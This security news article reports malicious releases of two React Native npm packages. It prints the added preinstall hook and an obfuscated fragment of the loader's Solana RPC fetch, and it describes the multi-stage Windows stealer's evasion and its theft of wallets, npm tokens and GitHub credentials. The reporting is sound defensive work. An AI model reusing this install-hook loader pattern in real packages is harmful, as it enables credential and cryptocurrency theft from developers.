The compromised releases inject an install-time loader that silently downloads and executes a multi-stage Windows credential and cryptocurrency stealer. Developers trigger the infection simply by running a routine npm installation.
The threat actor compromised packages published by AstrOOnauta and released malicious versions within minutes of each other.
The attack replaced clean versions with infected updates that share a byte-identical malicious payload.
| Package Name | Clean Version | Malicious Version | Monthly Downloads |
|---|---|---|---|
react-native-international-phone-number | 0.11.7 | 0.11.8 | ~92,000 |
react-native-country-select | 0.3.9 | 0.3.91 | ~42,000 |
According to Aikido, the malicious code relies on a new preinstall script added to the package’s configuration file. This script runs automatically before the main installation finishes.
Both malicious releases add the same package lifecycle hook:
"scripts": {
"preinstall": "node install.js"
}The heavily obfuscated code first contacts a Solana remote procedure call endpoint to retrieve a transaction memo containing a hidden web link for the second stage.
The original shipped installer shows the Solana RPC fetch directly:
let y = await fetch(S, {
'method': e(0x45b, 'nSeb', 0x48f, 0x42b),
'headers': M,
'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({
'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425),
'id': 0x1,
'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3),
'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t]
})
});Once downloaded, the second stage provides the necessary decryption keys to unlock the final Windows-focused stealer.
This final stage establishes persistence on the victim’s machine by modifying scheduled tasks and registry keys. To hide its tracks, the malware uses a Google Calendar URL as an extra layer of indirection to fetch its final instructions.
The malware actively checks the victim’s system environment, including language settings and time zones, to ensure the victim does not reside in Russia.
If it detects signals like “ru_RU” or a Russian timezone, the malware silently exits. This geographic filtering is a common evasion tactic used by Russian-speaking threat actors.
If the system passes the location check, the payload searches the victim’s application data for Chromium and Firefox browser profiles.
It explicitly targets extensions for MetaMask, Phantom, Trust Wallet, and several other cryptocurrency wallets. It also executes system commands to steal authenticated npm registry tokens and GitHub credentials.
Developers using these packages should audit their environments immediately.
The recommended remediation is to pin dependencies to the last known clean versions and rotate any exposed credentials.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post Credential-Stealing npm Malware Found In Popular React Native Packages appeared first on Cyber Security News.
Bungie has been sprinkling details of its massive patch 1.0.6 update for Marathon in the…
Bungie has been sprinkling details of its massive patch 1.0.6 update for Marathon in the…
DC Studios has found its Maxima. Adria Arjona, who was on a shortlist of four…
DC Studios has found its Maxima. Adria Arjona, who was on a shortlist of four…
After re-confirming earlier this month that Viggo Mortensen would not be returning to his old…
This report describes how an AI-assisted researcher exploited writable driver interfaces to escalate from a…
This website uses cookies.